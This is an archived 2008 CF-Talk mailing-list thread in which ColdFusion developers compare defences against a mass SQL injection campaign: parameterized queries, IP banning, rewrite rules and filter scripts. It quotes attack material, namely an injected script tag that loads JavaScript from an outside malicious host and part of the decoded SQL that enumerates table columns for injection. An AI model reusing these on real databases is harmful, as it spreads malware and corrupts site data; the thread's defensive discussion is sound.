RE: HELP! SQL Injection Attack!

2008-08-11 Thread Jaime Metcher
ge- > From: Brian Peddle [mailto:[EMAIL PROTECTED] > Sent: Saturday, 9 August 2008 4:28 AM > To: CF-Talk > Subject: Re: HELP! SQL Injection Attack! > > Just curious as I have not seen this on an old asp site months > ago and now on CF. Every IP lookup I do goes back to >

Re: HELP! SQL Injection Attack!

2008-08-11 Thread Tom Chiverton
On Friday 08 Aug 2008, Brian Peddle wrote: > Just curious as I have not seen this on an old asp site months ago and > now on CF. Every IP lookup I do goes back to If it's just a blind SQL injection attempt, the actual sending of the attack could be from a spoofed IP. -- Tom Chiverton

Re: HELP! SQL Injection Attack!

2008-08-08 Thread denstar
On Fri, Aug 8, 2008 at 2:31 AM, Tom Chiverton wrote: > On Friday 08 Aug 2008, denstar wrote: >> RewriteRule [EMAIL PROTECTED] /security-violation.htm [NC] > > Won't that match email address ? Yup. Don't think I use those in the url or path for anything tho. Modifying those rules are pretty strai

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Brian Peddle
Just curious as I have not seen this on an old asp site months ago and now on CF. Every IP lookup I do goes back to OrgName:Asia Pacific Network Information Centre OrgID: APNIC Address:PO Box 2131 City: Milton StateProv:

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Paul Ihrig
what are you seeing if you limit email to unique IP's? ours is way down if we do that. we are just sending unique ip's to one of our GREAT it guys to insert into ban list in firewall. should figure out how to auto add remove ip's On Fri, Aug 8, 2008 at 11:03 AM, Les Mizzell <[EMAIL PROTECTED]>

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Les Mizzell
> http://www.actcfug.com/files/_SQLPrev.zip After putting this on a number of sites in just the last two hours, I am completely blown away by the number of attacks I'm seeing! Over 2500 in less than 2 hours on just 3 sites. My poor mail server can't take all the extra incoming mail!!! I'm going

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Justin Scott
> I have to agree with Dave. Every possible client scope needs to be checked - > and the form scope seems rudimentary to me. Not checking the form scope is > like setting up a firewall and locking down everything except a few dozen > ports near the bottom of the stack (after all ... we rarely get a

RE: HELP! SQL Injection Attack!

2008-08-08 Thread Bruce Schuman
>-Original Message- >From: Dave Watts [mailto:[EMAIL PROTECTED] >Sent: Thursday, August 07, 2008 4:43 PM >To: CF-Talk >Subject: RE: HELP! SQL Injection Attack! > > > Since nearly all SQL injection attempts come through the URL > > (including the recent ones),

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Claude Schneegans
>>100 IPs is hardly any RAM. I'd use 10k entries, just as a starting number and scale down if it really becomes an issue. Another approach would be to store also the date the IP was entered in the list, and remove it after a certain number of days.

RE: HELP! SQL Injection Attack!

2008-08-08 Thread Mark Kruger
attacked from ports 10 through 30 :) -Mark -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 4:43 PM To: CF-Talk Subject: RE: HELP! SQL Injection Attack! > Since nearly all SQL injection attempts come through the URL > (includi

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Dominic Watson
All our AOL users (a substantial amount) come through on a single proxy ip address. We set up ip blacklisting and almost instantly we had blocked all our aol users (we quickly took down the black listing). Something to consider. Dominic 2008/8/8 Tom Chiverton <[EMAIL PROTECTED]>: > On Friday 08

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Mike Kear
Just to make sure the finger points in the right place - the minor mis-spelling that Peter talks about was in a change that I made to Justin's file so it would work ok on our system. We require mail server, username and password in any cfmail tag, so I added them and made a dyslexic typing error.

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Peter Tilbrook
Wondering if SQL in form fields is also a risk. At any rate Justin D. Scott of GravityFree ([EMAIL PROTECTED]) released a handy script which you can grab here: http://www.actcfug.com/files/_SQLPrev.zip The original script had a minor mis-spelling bug and I made the keywords alphabetical in orde

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Tom Chiverton
On Friday 08 Aug 2008, denstar wrote: > RewriteRule [EMAIL PROTECTED] /security-violation.htm [NC] Won't that match email address ? -- Tom Chiverton

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Tom Chiverton
On Thursday 07 Aug 2008, Ian Skinner wrote: > Exactly, if you are managing a popular enough site, it could happen. At > least once or twice in a blue moon. Likewise, you have plenty of other users, losing one isn't a big deal. -- Tom Chiverton

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Tom Chiverton
On Friday 08 Aug 2008, Mike Kear wrote: > It's just plain annoying. What's the point of the attacks? What > does the attacker get out of it? Cash. It's either gaming search results in Google or pushing malware. -- Tom Chiverton

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Tom Chiverton
On Thursday 07 Aug 2008, Claude Schneegans wrote: > based on the idea that > the bot is probably operating from an innocent infected PC and will > not be a threat for months, Oh, it will. Windows users who are infected are probably very unlikely to ever be cleaned. > about 100 or

Re: HELP! SQL Injection Attack!

2008-08-08 Thread Mike Kear
It's a pity there isn't a way to stop these hackers coming to the site in the first place. I put Justin's script on some of my sites this afternoon and my mail box is filling up, drawing my attention to how many of these bloody attempts there are. Up to now, I've just had it happening automatica

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Rizal Firmansyah
Yup, that's correct Justin. Just a warning sign though :) I switched my hosting back in 2003, because the system even though it gives me my own SQL user/pass but it actually can see and query other DBs on the same machine (wrong priv). My current hosting, also allows user to query 3-4 other DB, bu

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Jeffrey Lemire
We also have been seeing this attack as well. Most of the SQL statement is in a hexadecimal format so it seems that using "keyword" filters could potentially be rendered innocuous (assuming the entire statement is all in hexadecimal). Why would ColdFusion or MSSQL accept SQL statements formatted

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Justin D. Scott
> Now this is real bad for shared hosting customers. > Cause even if we protect our sites, that SQL simply > queries all tables in the SQL server. So, if you > found your data compromised, the leak may have been > caused by other sites that are using the same SQL > machine, duh! On SQL Server the

Re: HELP! SQL Injection Attack!

2008-08-07 Thread denstar
I guess I should add that it checks both the file path/URL, and the query-string, for malicious whatnots. The file path/URL is probably only needed if you're already using rewrites. Otherwise you only need the ones with QUERY_STRING, probably. Also, I've commented out the "http:" rule, which you

Re: HELP! SQL Injection Attack!

2008-08-07 Thread denstar
I've cobbled together some stuff for apache that helps a good bit: Using mod_rewrite, you can at least prevent stuff from getting to CF. It still hits the webserver, but hey, better there than all the way to your appserver! Here's a modded version of some rewrites I found for IIS (MS people can f

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Rizal Firmansyah
I tried to decipher the SQL injection which hits my websites thousand times for this week. I found this particular code (it's attacking MS SQL): select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=... or b.xtype=... or b.xtype=... or b.xtype=...) The

RE: Re: HELP! SQL Injection Attack!

2008-08-07 Thread [EMAIL PROTECTED]
igger it. -Justin Scott --- Original Message --- >From: morchella[mailto:[EMAIL PROTECTED] Sent: 8/7/2008 6:39:26 PM To : cf-talk@houseoffusion.com Cc : Subject : RE: Re: HELP! SQL Injection Attack! does Justin's file redirect the intruder? i tried pass

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Al Musella, DPM
I meant to say: Set the deny permission on the system table to the user that you use to access the database from cf At 07:27 PM 8/7/2008, you wrote: >You should set the permissions on the system table so that you can >not read or write to the system tables. There

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Al Musella, DPM
>Your database contains all its object names in metadata tables, which can be >queried directly. It was mentioned last week, but just to re-iterate: You should set the permissions on the system table so that you can not read or write to the system tables. There is no need for it, and by remo

Re: HELP! SQL Injection Attack!

2008-08-07 Thread brad
It's a jungle out there. - Original Message - From: "Les Mizzell" <[EMAIL PROTECTED]> To: "CF-Talk" Sent: Thursday, August 07, 2008 2:53 PM Subject: Re: HELP! SQL Injection Attack! >> http://www.gravityfree.com/_sqlprev.cfm.txt > > &

Re: HELP! SQL Injection Attack!

2008-08-07 Thread morchella
does Justin's file redirect the intruder? I tried passing /products/index.cfm?n1Id=1&FOREIGN=test but nothing happened I am including the file in my application.cfm modified the email & such.. how can I test it

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Terry Ford
We run a very large linux website and have seen such SQL attacks for months now. However, this recent wave has *really* picked up over the last 48 hours. It began August 6, and we have logged close to 40,000 attack attempts and counting. Our code is well protected, and this attack appears

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Bruce Schuman
Just want to chime in on this -- I also stuck Justin's file online, and in just a few minutes, I had two of these email warnings. Very helpful for my naive non-parameterized pages. One thing I like about the email is, it tells me my domain and page of the attack -- and also the IP address whe

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Dave Watts
> Since nearly all SQL injection attempts come through the URL > (including the recent ones), that is where I put the focus. Nearly all automated SQL injection attempts come through the URL. The ones that, say, compromise peoples' credit card data, they typically come from forms. > With this sc

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Les Mizzell
> I just put this on a site for testing purposes - and less than one hour > later - over 2 dozen emails to me of attack attempts 6 more from a different IP address while I was typing my original message!! Unreal!

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Les Mizzell
> http://www.gravityfree.com/_sqlprev.cfm.txt Dude!!! Whoa!!! I just put this on a site for testing purposes - and less than one hour later - over 2 dozen emails to me of attack attempts I've got cfqueryparam on all queries on this site already, but to see that many attacks almost im

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Justin Scott
> Good effort... It does not check the form scope however - or CGI Since nearly all SQL injection attempts come through the URL (including the recent ones), that is where I put the focus. With this script I would not recommend checking the form scope as there is too high a risk of false positi

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Mark Kruger
PROTECTED] Sent: Thursday, August 07, 2008 12:36 PM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! > And yes, I'd like to see the URL "loop" script that was offered by > Justin Scott I've had many requests for the SQL injection prevention script, so I'm ju

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Rebecca Wells
I'd be interested in seeing this also. >We have CF5 >and CFMX versions if anyone wants a copy. > > >-Justin Scott

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Brad Wood
- Original Message - From: "Bruce Schuman" <[EMAIL PROTECTED]> > I must have 100,000 pages I need to protect -- Better get started then. :) Read about two tools that can make the job easier for you: http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-Internati

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Justin Scott
> What I'm wondering is the pros and cons of doing it this way. Does it > slow down the app checking for this on every page hit? Or do it the old > fashioned way and clean up all the queries. Thoughts? That depends on what your definition of slow is. On a modern server a simple check for a sp

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Justin Scott
> I must have 100,000 pages I need to protect -- and my primary > database has something like 180 tables, some of which have more than > 100 fields. So, I need something I can do quickly. And I got a lot > to learn about this. See my previous post regarding this code which can be placed in fr

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Tim Do
page hit? Or do it the old fashioned way and clean up all the queries. Thoughts? -Original Message- From: Justin Scott [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! > And yes, I'd like to see the URL "

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Bruce Schuman
Thanks, Andy and Ian -- I am going through this previous thread (I did get hit with this 2 or 3 weeks ago also) -- so, I am just wondering how I can get a basic/minimal level of protection installed, maybe linked from application.cfm I must have 100,000 pages I need to protect -- and my primary

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Justin Scott
> And yes, I'd like to see the URL "loop" script that was offered by Justin > Scott I've had many requests for the SQL injection prevention script, so I'm just going to post a URL directly to the code and release it into the public domain for anyone interested: http://www.gravityfree.com/_sqlp

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Dave Watts
> Can this be done through a URL? Yes, easily. > Does the list of fields that have been injected provide any > clue about how or where the injection attack occurred? How > do these guys, or their program, know my table names and my > field names? I have some very obscure field names, and the

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Dave Watts
more information! > -Original Message- > From: Bruce Schuman [mailto:[EMAIL PROTECTED] > Sent: Thursday, August 07, 2008 12:17 > To: CF-Talk > Subject: RE: HELP! SQL Injection Attack! > > > The attack appends JavaScript to character fields. > > >

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Jacob
Any recommendations for web app firewall? I have worked with Netscreen network firewall for years. -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 9:01 AM To: CF-Talk Subject: RE: HELP! SQL Injection Attack! > I'd like to know h

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Ian Skinner
Bruce Schuman wrote: > How do they do this? Yes it is done through the URL. This is well discussed here and in many blogs. But the gist is that the errant URL parameter is an ENTIRE SQL function that will tell your database to scan every table looking at every field, and if the field is

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Andy Matthews
rsday, August 07, 2008 11:17 AM To: CF-Talk Subject: RE: HELP! SQL Injection Attack! > The attack appends JavaScript to character fields. Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don'

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Matt Blatchley
We've got the same thing. Sonicwall checks everything coming in and out of the network and checks for anything that matches a database of known injection types. Helps a ton! Matt > We drew a great deal of breathing room to implement the solutions > discussed here with our installation of Son

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Bruce Schuman
> The attack appends JavaScript to character fields. Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don't know. And I have been hit by this current wave of injection So, my SQL Server 200

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Mark Atkinson
We drew a great deal of breathing room to implement the solutions discussed here with our installation of Sonicwall firewall (about 600 bucks). Its intrusion prevention settings are highly configurable, both globally and individually, and with an annual subscription of 200 dollars we get I beli

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Claude Schneegans
>>I'm a little bemused as to why you'd create such a response guys. Just to make sure I give a chance to a legitimate user, in case my robot detection was a bit too strong. For instance, I also have a test based on the number of HTTP requests per second in order to discriminate robots from human

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Ian Skinner
Craig Dudley wrote: > I suppose it would help **IF** a legitimate user came to your site at a > later date from a banned IP, but that's all, or is that why you are doing > it? > > Craig. Exactly, if you are managing a popular enough site, it could happen. At least once or twice in a blue moon.

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Dave Watts
> I'd like to know how I can stop the requests from ever > hitting the web-server. > > Can anyone point me at a resource for a firewall solution? > I've seen some isapi filter solutions, but they all seem to > just clean the querystring and then forward the request on -- > so it's still hittin

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Craig Dudley
r date from a banned IP, but that's all, or is that why you are doing it? Craig. -Original Message- From: Claude Schneegans [mailto:[EMAIL PROTECTED] Sent: 07 August 2008 16:42 To: CF-Talk Subject: Re: HELP! SQL Injection Attack! >>"Your system appears to be infect with a

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Claude Schneegans
>>"Your system appears to be infect with a bot and it is currently banned from access this site..." The cherry on the sundae ;-) In this page, I even have a form so the user can give his address and claim his innocence ;-) -- ___ REUSE CODE! Use custom tags;

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Ian Skinner
Claude Schneegans wrote: > - In your application.cfm, simply check if cgi.REMOTE_ADDR is in the > list of banned addresses > and CFABORT if yes. Just throwing a random thought that occurred to me when I read this. If one cares to be a little nicer and proactive, maybe throw up a very simple

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Claude Schneegans
>>I was hoping to find an elegant solution that stored the IPs in the application scope for the length of the session timeout and then gracefully removed the banned IPs once the session timed out. How about doing this: - Create a server scope array or list (if you have several sites), or just in

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Che Vilnonis
all of its methods. Regards, CV. -Original Message- From: Claude Schneegans [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:14 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! >>Claude, could you possibly share your code that stores the bad IP addresses for a

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Claude Schneegans
>>I'd like to know how I can stop the requests from ever hitting the web-server. If you detect the attack at the first request, and block the IP, the bot will not even get the first page, will not see all links in it, and will not search your entire server. --

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Claude Schneegans
>>Claude, could you possibly share your code that stores the bad IP addresses for a period of time to prevent these useless http requests? Thanks, CV. Well, I'd be happy to, but it is a rather complete and complicated system. It works for all sites/domains on the CF server, uses a database, and

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Randy Johnson - CFConcepts
> No, that's exactly what he described. The attack appends JavaScript to > character fields. And, unfortunately, blocking specific IP addresses won't > get you very far here, because it's a random, automated attack run from > compromised hosts in a botnet, I think. > > Yea I think it is too. I

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Claude Schneegans
>>Tuesday night received about 20 thousand instances (not an exaggeration). Slowing down now for us, but, heh, it's early. This is where banning IPs at the first attempt will reduce this pollution. If the attack is detected at the first attempt, and the address banned, the statistics will show on

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Kris Jones
I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? I've seen some isapi filter solutions, but they all seem to just clean the querystring and then forward the request on -- so it's still hitting CF. I'd really l

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Che Vilnonis
! SQL Injection Attack! >>blocking specific IP addresses won't get you very far here, because it's a random. blocking IP addresses won't prevent injection in your database if it is not protected, but if an attack is detected the very first attempt, it will save thousands of

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Claude Schneegans
>>blocking specific IP addresses won't get you very far here, because it's a random. blocking IP addresses won't prevent injection in your database if it is not protected, but if an attack is detected the very first attempt, it will save thousands of useless HTTP requests on your sites, because

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Kris Jones
We handled this attack last month (it never did get through), and starting Tuesday night received about 20 thousand instances (not an exaggeration). Slowing down now for us, but, heh, it's early.

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Les Mizzell
> We have CF5 and CFMX versions if anyone wants a copy. I really see having several layers of protection to effectively stop this sort of thing. Something at the application level sounds like a good first line of defense. I'd be interested in seeing this. Thanks

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Claude Schneegans
>>Various people have been warning in the last few weeks that this sort of scatter gun approach that started with ASP-based sites is now migrating to ColdFusion powered ones. And it is growing up. Yesterday, my bad bot closed the door to about 50 attacks, and this morning I have 60 reported. Usu

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Justin D. Scott
> Anyway, whatever solves the Michael's problem I feel sure > is going to be a combination of things, not just the one. Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure an

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Mark Kruger
andard. -Mark -Original Message- From: Mike Kear [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 6:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! Well, as I said, the answer to this (as it is for a lot of things on the web) is not one but a combination of tactics. T

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Tom Chiverton
On Thursday 07 Aug 2008, Bobby Hartsfield wrote: > The solution is to filter all input from users with something like > cfqueryparam. The only reason to combine that with another solution is to > filter data that made it in already... and like Tom said, Ahh, no, not the only reason. Suppose I ente

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Bobby Hartsfield
ur user content, the terrorists win. ;-) ..:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com -Original Message- From: Mike Kear [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 7:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! Well, as I said, th

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Tom Chiverton
On Thursday 07 Aug 2008, Dave Watts wrote: > Use CFQUERYPARAM around all user-submitted query values. And htmlEditFormat() around places where database data is output to the end user. -- Tom Chiverton

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Mike Kear
Well, as I said, the answer to this (as it is for a lot of things on the web) is not one but a combination of tactics. The ban ip thing might not be the bees knees for this but it sure helps with the kind of thing I THOUGHT he was describing. I've been able to almost eliminate spam entries from

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Dave Watts
> I'm a ColdFusion noob and my database just got injected with > some script. > So for example one of the database field would appear > something like so: > Gisella427.jpg"> src="http://jjmaoduo.3322.org/csrss/w.js";>

RE: HELP! SQL Injection Attack!

2008-08-07 Thread Dave Watts
> I know you haven't described a SQL injection ... No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet,

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Tom Chiverton
On Thursday 07 Aug 2008, Dominic Watson wrote: > Yes, I alerted my bosses to this at the time and unfortunately nothing > was done - we were too pressed for time. We now have 4 people going > through the site patching up all the vulnerable queries. It's sad but true that security holes are never s

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Dominic Watson
Yes, I alerted my bosses to this at the time and unfortunately nothing was done - we were too pressed for time. We now have 4 people going through the site patching up all the vulnerable queries. Dominic 2008/8/7 Tom Chiverton <[EMAIL PROTECTED]>: > On Thursday 07 Aug 2008, Dominic Watson wrote:

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Tom Chiverton
On Thursday 07 Aug 2008, Dominic Watson wrote: > It appears we've been attacked by this last night / this morning too. Various people have been warning in the last few weeks that this sort of scatter gun approach that started with ASP-based sites is now migrating to ColdFusion powered ones. --

Re: HELP! SQL Injection Attack!

2008-08-07 Thread Dominic Watson
It appears we've been attacked by this last night / this morning too. Will update here with more info when we have it. Dominic 2008/8/7 Mike Kear <[EMAIL PROTECTED]>: > There are a number of things you can do, and in fact i use all of these - > > [A] Find out this person's ip address, and if the

Re: HELP! SQL Injection Attack!

2008-08-06 Thread Mike Kear
There are a number of things you can do, and in fact I use all of these - [A] Find out this person's ip address, and if the form is submitted from that ip address, do nothing. Don't give them any kind of feedback at all. That'll stop this current attack, but since these idiots usually dart fro